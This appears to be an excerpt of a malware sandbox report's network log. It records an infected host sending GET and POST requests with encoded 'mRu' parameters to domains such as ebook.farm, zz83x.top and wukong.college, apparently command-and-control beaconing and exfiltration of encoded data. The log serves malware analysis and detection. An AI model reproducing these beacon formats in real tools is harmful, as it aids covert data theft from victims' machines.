                                                                                                                            Data Raw: 6d 52 75 3d 66 35 74 69 43 42 6b 54 4f 36 57 57 4b 35 54 70 31 73 46 32 50 46 52 6f 39 65 6e 6b 6b 70 54 57 64 79 4d 2b 33 76 41 68 48 68 50 49 4c 79 56 61 47 4a 32 4a 45 56 38 72 4a 75 4c 55 32 36 65 68 6d 2f 2b 6b 33 65 41 71 67 72 4c 58 74 34 58 4a 65 64 58 54 6e 4d 67 73 38 61 34 52 4b 2f 75 56 52 6d 77 45 57 4b 54 56 4d 34 53 7a 71 6c 4a 75 37 38 5a 68 46 57 4d 47 54 5a 51 38 66 45 63 2b 6c 38 7a 33 69 36 72 31 6f 2f 64 32 71 49 4e 2f 7a 53 7a 6b 46 72 61 54 7a 46 47 52 36 42 36 54 51 4d 77 72 59 4a 52 4f 30 75 30 58 56 63 64 6f 77 31 79 48 55 68 6b 6a 71 32 75 7a 52 58 6c 43 31 51 61 47 55 52 62 37 56 54 51 53 6e 45 4b 2b 69 71 69 6e 4e 77 57 55 5a 52 4f 71 39 57 45 49 53 37 65 46 49 51 30 69 4e 37 59 78 31 79 5a 65 6c 63 74 4a 6a 61 78 55 4c 71 6b 31 77 41 4a 41 77 6b 59 67 78 47 4c 33 35 41 43 49 4f 4e 37 42 48 6b 2b 59 72 70 38 4b 63 4e 79 6d 30 50 4c 73 5a 7a 2b 6b 38 76 72 47 69 56 66 57 6b 74 4a 42 55 55 45 68 33 45 68 71 71 6d 58 4f 30 4c 30 30 6f 61 39 47 53 71 69 78 42 53 68 57 38 33 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=f5tiCBkTO6WWK5Tp1sF2PFRo9enkkpTWdyM+3vAhHhPILyVaGJ2JEV8rJuLU26ehm/+k3eAqgrLXt4XJedXTnMgs8a4RK/uVRmwEWKTVM4SzqlJu78ZhFWMGTZQ8fEc+l8z3i6r1o/d2qIN/zSzkFraTzFGR6B6TQMwrYJRO0u0XVcdow1yHUhkjq2uzRXlC1QaGURb7VTQSnEK+iqinNwWUZROq9WEIS7eFIQ0iN7Yx1yZelctJjaxULqk1wAJAwkYgxGL35ACION7BHk+Yrp8KcNym0PLsZz+k8vrGiVfWktJBUUEh3EhqqmXO0L00oa9GSqixBShW833kwCneNC+Yorx0zAYDS9A5+D/ZfNif2jeHCZg55IrOo7/SLg+FeYA0QL0BKPYCPTF9bZPfxTK3PMo4KZF3L3aqMQOdb7q8QyyyxPSotj3ty6VHXJA4K2CeG9xBicW4/SPuf+dtIvsiuQAXt5jk+rWgcD8OqnQX2hVUpzFTULKGlbb4zdEoA+Uwdvklp242HCBcGSkeLX8LPT4xGzdlOLNRcwc6tybMMe8yVDoAIQhOaNZY8YvcppDOzRc8JEDe6KItsfeLZzFTOJ92vI5kOtJ7IXZrjJUANHcbzV4nQ1brN4Fp/BGe9Txq5ezJ+cO99E5Kqufb5it/sZ9p5e14DFKKVR4NWhDhgTPrtBTnqElRyVvofBtQ5F8p6WTv51qAZNTYQFn3ER8WWbDffGOqqnYHBBxmwsEAmfRlubztiL1VWbQtqchItFZwqnSxfpyMYuKHYTu0dPTfGEA/WW2vJMoEuIzTu/DpNSSRNkHM1+i1It5qd2EU7nIHH9cSzyB0KdcUlGqqiyXs2Dh7ooCmtleG0TpGiVmDwQ6pi+PSMXMrLSs51Va0oXXqrHnCd2rrw6I4Jtc8sedKczTEFn2CyJ4oyOias9bLWlZ9SzFqECZoa+E14jh69AfV4nYZOdKtkPFzyqWYCkiQbqWjyaYu2dVhngE3yqYlG8Su [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:33:25.272809982 CET5332OUTData Raw: 56 59 42 41 6a 43 33 74 42 4b 70 62 77 44 31 63 75 45 4e 74 4e 30 65 4a 74 79 41 48 56 35 53 2f 78 4c 35 6f 55 6c 59 30 7a 46 72 42 67 4a 6d 76 66 42 37 43 78 36 6b 59 4e 72 68 55 4c 35 67 66 48 4d 6d 51 71 66 4f 67 4d 2b 31 36 43 39 52 32 64 71
                                                                                                                            Data Ascii: VYBAjC3tBKpbwD1cuENtN0eJtyAHV5S/xL5oUlY0zFrBgJmvfB7Cx6kYNrhUL5gfHMmQqfOgM+16C9R2dqzdYp/Zu/mvSD6ZMi7wRDqL1oGfX0S9BaZcoAKDiJ3KVDRCV5vCrZ//rppgObWLnRPcJ5h9NdIesr1tiMUAdZugt2iTaAxDx/4aV+o/GfduHJLgzZ5+9WOjWogwaNTueaS0Yi8yScflj4l5Zny7h9u83qThVxyzY8y
                                                                                                                            Nov 12, 2024 15:33:25.407622099 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:33:24 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1110
                                                                                                                            x-request-id: 313ecf32-c24b-4851-b43a-b7a3e5afaab3
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw==
                                                                                                                            set-cookie: parking_session=313ecf32-c24b-4851-b43a-b7a3e5afaab3; expires=Tue, 12 Nov 2024 14:48:25 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 54 4a 52 64 30 63 42 67 2f 57 67 30 71 70 68 35 79 34 78 2b 4d 71 6e 4b 44 38 74 6d 66 4e 30 71 46 59 79 7a 35 37 35 6c 36 4d 5a 4e 51 65 48 47 48 38 34 36 71 37 53 64 76 4e 76 61 64 45 4c 6d 57 71 79 41 6e 6c 53 4b 46 6c 70 67 38 51 46 66 70 74 51 65 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_TJRd0cBg/Wg0qph5y4x+MqnKD8tmfN0qFYyz575l6MZNQeHGH846q7SdvNvadELmWqyAnlSKFlpg8QFfptQeiw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:33:25.407639027 CET510INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzEzZWNmMzItYzI0Yi00ODUxLWI0M2EtYjdhM2U1YWZhYWIzIiwicGFnZV90aW1lIjoxNzMxNDIyMDA1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZWJvb2suZmFybS9yemF


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            60192.168.11.2049779199.59.243.22780
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:27.940453053 CET473OUTGET /rzaq/?mRu=S7FCB2U3I5+MEOix97haLm8n4ZiU5s+sYyIa9Io4LXSLJStcMtKrD203LPev0YXMiZ/cleh4jZ/UsKrDR5eop/VU9oI7TN7VO3RaOL7GPdXsiE9kkN1XODc=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.ebook.farm
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:33:28.075597048 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:33:27 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1438
                                                                                                                            x-request-id: ba442f54-a3f4-4968-b738-892d2a18b930
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FDDVJK0xp41bVVAlunYPLIzPiti/Lc71sRgoxPw9fMkavBHzD0Nr835Zy+NFy1zMWJQQm8/5R6P9hopVFy2viQ==
                                                                                                                            set-cookie: parking_session=ba442f54-a3f4-4968-b738-892d2a18b930; expires=Tue, 12 Nov 2024 14:48:28 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 46 44 44 56 4a 4b 30 78 70 34 31 62 56 56 41 6c 75 6e 59 50 4c 49 7a 50 69 74 69 2f 4c 63 37 31 73 52 67 6f 78 50 77 39 66 4d 6b 61 76 42 48 7a 44 30 4e 72 38 33 35 5a 79 2b 4e 46 79 31 7a 4d 57 4a 51 51 6d 38 2f 35 52 36 50 39 68 6f 70 56 46 79 32 76 69 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FDDVJK0xp41bVVAlunYPLIzPiti/Lc71sRgoxPw9fMkavBHzD0Nr835Zy+NFy1zMWJQQm8/5R6P9hopVFy2viQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:33:28.075615883 CET838INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmE0NDJmNTQtYTNmNC00OTY4LWI3MzgtODkyZDJhMThiOTMwIiwicGFnZV90aW1lIjoxNzMxNDIyMDA4LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZWJvb2suZmFybS9yemF


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            61192.168.11.2049780206.119.81.12180
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:36.489474058 CET472OUTGET /mk81/?mRu=gzc9tI9/iKFBs/CfQiHfQ1hmFq4huhxeMTnwpTnTnn57GmdDkYbUUImaMzeYKxMl89CL7o6kx1g4xig0s43SWJ3EiMJuN9y4NOM7gvWFzz5YCjlwg0gKJrc=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.zz83x.top
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:33:36.804577112 CET312INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx
                                                                                                                            Date: Tue, 12 Nov 2024 14:33:36 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 148
                                                                                                                            Connection: close
                                                                                                                            ETag: "66f0ea70-94"
                                                                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            62192.168.11.204978147.52.221.880
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:42.142107010 CET753OUTPOST /4wc1/ HTTP/1.1
                                                                                                                            Host: www.wukong.college
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.wukong.college
                                                                                                                            Referer: http://www.wukong.college/4wc1/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 42 62 68 4e 4d 50 31 41 4a 70 38 37 4c 76 77 48 35 55 39 4c 36 38 62 41 75 79 47 62 6a 78 4f 4e 4b 70 55 6b 73 75 75 59 43 37 58 49 6c 55 4c 48 35 64 50 39 75 4f 69 4c 47 2f 77 61 63 78 71 66 6f 36 74 47 54 50 77 4a 58 6a 4b 74 39 4d 46 51 4e 47 39 41 57 47 79 62 69 42 5a 44 44 48 6d 51 62 70 52 63 70 73 49 69 30 52 7a 4e 37 6b 5a 72 59 59 49 6e 37 37 36 51 34 2b 36 6c 41 6d 6b 4d 38 4f 74 62 4a 42 51 52 36 68 54 37 55 6c 4d 50 38 68 4c 34 70 58 67 6b 6a 2b 7a 68 78 6d 77 72 38 70 45 73 61 47 73 2b 73 76 45 41 4f 43 36 69 77 74 79 44 4c 77 3d 3d
                                                                                                                            Data Ascii: mRu=7qP3g7pHYt35BbhNMP1AJp87LvwH5U9L68bAuyGbjxONKpUksuuYC7XIlULH5dP9uOiLG/wacxqfo6tGTPwJXjKt9MFQNG9AWGybiBZDDHmQbpRcpsIi0RzN7kZrYYIn776Q4+6lAmkM8OtbJBQR6hT7UlMP8hL4pXgkj+zhxmwr8pEsaGs+svEAOC6iwtyDLw==
                                                                                                                            Nov 12, 2024 15:33:42.465173960 CET389INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:33:42 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Content-Length: 178
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00
                                                                                                                            Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+|OX)@OG>Wr~b


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            63192.168.11.204978247.52.221.880
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:45.002990961 CET773OUTPOST /4wc1/ HTTP/1.1
                                                                                                                            Host: www.wukong.college
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.wukong.college
                                                                                                                            Referer: http://www.wukong.college/4wc1/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 41 37 52 4e 41 4e 64 41 63 5a 38 34 48 50 77 48 33 30 39 58 36 38 66 41 75 7a 44 63 6a 6a 71 4e 4b 4d 6f 6b 2b 38 4b 59 50 62 58 49 74 30 4b 44 6e 74 50 49 75 4f 75 35 47 2f 63 61 63 79 57 66 6f 2b 39 47 54 63 49 57 55 54 4b 76 6f 38 46 65 4a 47 39 41 57 47 79 62 69 42 63 6f 44 47 4f 51 62 5a 68 63 70 4e 49 68 33 52 7a 4f 2b 6b 5a 72 4a 6f 49 6a 37 37 37 44 34 38 4f 50 41 6c 51 4d 38 4c 52 62 4a 51 51 53 30 68 54 35 4a 31 4e 41 33 52 75 51 68 55 41 6d 71 4e 44 38 2b 30 55 77 77 66 4a 32 48 30 59 61 76 38 59 79 4b 79 44 4b 79 76 7a 59 57 35 4a 56 2f 6f 74 75 33 4d 39 6e 47 61 33 46 4e 54 35 72 56 4f 38 3d
                                                                                                                            Data Ascii: mRu=7qP3g7pHYt35A7RNANdAcZ84HPwH309X68fAuzDcjjqNKMok+8KYPbXIt0KDntPIuOu5G/cacyWfo+9GTcIWUTKvo8FeJG9AWGybiBcoDGOQbZhcpNIh3RzO+kZrJoIj777D48OPAlQM8LRbJQQS0hT5J1NA3RuQhUAmqND8+0UwwfJ2H0Yav8YyKyDKyvzYW5JV/otu3M9nGa3FNT5rVO8=
                                                                                                                            Nov 12, 2024 15:33:45.323919058 CET389INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:33:45 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Content-Length: 178
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e 3d 0f 82 30 14 45 f7 fe 8a 27 bb 3c 30 8c 4d 07 f9 88 24 88 c4 94 c1 11 6d 4d 49 90 22 2d 12 ff bd 14 16 c7 fb ee 79 27 97 ee 92 4b cc 6f 55 0a 27 7e 2e a0 aa 8f 45 1e 83 b7 47 cc 53 9e 21 26 3c d9 9a 83 1f 20 a6 a5 c7 08 55 f6 d5 31 aa 64 23 96 60 5b db 49 16 05 11 94 da 42 a6 a7 5e 50 dc 8e 84 e2 0a d1 bb 16 5f f7 17 b2 3f 66 49 84 0e 8c 2b 09 a3 7c 4f d2 58 29 a0 be 16 80 d1 fc 08 11 e6 c6 40 bf e0 4f 87 83 ee c1 aa d6 80 91 e3 47 8e 3e c5 c1 e9 57 f1 a2 72 83 c8 0f 7e 87 62 a0 cb 00 00 00
                                                                                                                            Data Ascii: M=0E'<0M$mMI"-y'KoU'~.EGS!&< U1d#`[IB^P_?fI+|OX)@OG>Wr~b


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            64192.168.11.204978347.52.221.880
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:33:47.860832930 CET1289OUTPOST /4wc1/ HTTP/1.1
                                                                                                                            Host: www.wukong.college
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.wukong.college
                                                                                                                            Referer: http://www.wukong.college/4wc1/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 37 71 50 33 67 37 70 48 59 74 33 35 41 37 52 4e 41 4e 64 41 63 5a 38 34 48 50 77 48 33 30 39 58 36 38 66 41 75 7a 44 63 6a 6a 69 4e 4c 36 38 6b 73 4d 32 59 4f 62 58 49 6e 55 4b 41 6e 74 50 52 75 50 47 39 47 2f 68 6c 63 30 61 66 70 63 31 47 48 39 49 57 44 6a 4b 76 71 38 46 66 4e 47 39 56 57 47 69 66 69 42 4d 6f 44 47 4f 51 62 61 70 63 67 38 49 68 37 78 7a 4e 37 6b 5a 76 59 59 49 4c 37 37 69 32 34 38 61 31 48 57 49 4d 2f 72 68 62 45 43 49 53 34 68 54 2f 61 46 4d 66 33 52 53 50 68 55 64 58 71 4d 6e 61 2b 7a 49 77 36 65 30 68 55 48 77 43 78 50 38 45 47 42 72 67 35 50 54 50 65 37 52 76 76 34 68 61 77 4b 35 72 46 70 71 4e 57 44 52 49 4d 4c 35 6a 46 2f 35 67 74 43 54 36 7a 5a 34 36 62 54 48 53 4e 69 4c 32 6b 41 61 78 76 4f 68 42 37 63 57 2b 6f 4c 4e 58 2b 6b 6a 4a 30 78 42 42 70 67 36 6b 41 34 41 61 4a 7a 34 59 6e 32 46 39 36 2f 71 75 76 74 66 4d 63 6d 61 59 76 44 62 4a 61 4f 37 4b 6a 63 6a 2f 4f 30 72 2b 37 2f 75 36 43 5a 34 55 52 33 36 66 46 54 32 69 5a 41 31 76 32 43 4d 39 70 30 64 53 4d 6f [TRUNCATED]
                                                                                                                            Data Ascii: mRu=7qP3g7pHYt35A7RNANdAcZ84HPwH309X68fAuzDcjjiNL68ksM2YObXInUKAntPRuPG9G/hlc0afpc1GH9IWDjKvq8FfNG9VWGifiBMoDGOQbapcg8Ih7xzN7kZvYYIL77i248a1HWIM/rhbECIS4hT/aFMf3RSPhUdXqMna+zIw6e0hUHwCxP8EGBrg5PTPe7Rvv4hawK5rFpqNWDRIML5jF/5gtCT6zZ46bTHSNiL2kAaxvOhB7cW+oLNX+kjJ0xBBpg6kA4AaJz4Yn2F96/quvtfMcmaYvDbJaO7Kjcj/O0r+7/u6CZ4UR36fFT2iZA1v2CM9p0dSMo3Td2dRorgOsidURgvc3Qrhl7C0EYMJS5u1iAiwtsV4QbYcp2g+0g3fvSIBFWPkcGpuERIRUCT6+UhvctNHpCNUPTW4mDPAre+/aWP+BBTq2NcC2Ky4HW8XpGcZn8CPyZUL1deHk+wHsUtUGxVXEhQl4f7brxRP2l9OsGKQ1Foypm68boFymbuAXYRUbA/3vEdVKgulJCXCCV2fcunNNkKi12Amxgy1yc2ehLj22oIilpCStcJogY4HwMcQ2DQtNxpMlTOLfI+0q3ath1w+iRlEG2433/z+TVtqXL97uV0qUbnAOiIXSJBWhXdH3h1fHpQohXBMEivLa3erFbliubcu4m27B9YmW3xW1IuAAFDcc4DOBlAySU4uTXereOGGfCoPsXXhPwthl9r
                                                                                                                            Nov 12, 2024 15:33:47.860907078 CET6633OUTData Raw: 51 48 71 77 57 51 32 44 6e 4f 62 57 2f 38 66 55 52 6a 37 55 2f 39 5a 42 72 52 6e 77 49 6b 56 6e 4d 50 46 54 6e 71 4a 73 77 63 72 65 57 6e 57 6c 74 70 4c 59 58 2f 36 61 55 58 37 69 2f 39 4c 56 55 39 4f 65 34 50 68 38 76 70 7a 72 45 45 49 43 4d 55
                                                                                                                            Data Ascii: QHqwWQ2DnObW/8fURj7U/9ZBrRnwIkVnMPFTnqJswcreWnWltpLYX/6aUX7i/9LVU9Oe4Ph8vpzrEEICMUPjje0KYInHLGXGbKmdyFnqlk1qR5a0JzRTWO7zISkN5jf6r3Xa49aJgKntk3cag1Wt76cE/6XYtv7kxbrU7ihOHmNj+c92ll0Eqak2KZ8z+zOf0OjDipqxisB+80l91OoGsuqFKlSb7nfpCxyDceMVwffSTYEdEhs
                                                                                                                            Nov 12, 2024 15:33:48.181852102 CET389INHTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 12 Nov 2024 14:33:48 GMT
                                                                                                                            Server: Apache
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Encoding: gzip
                                                                                                                            Content-Length: 178
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html; charset=iso-8859-1
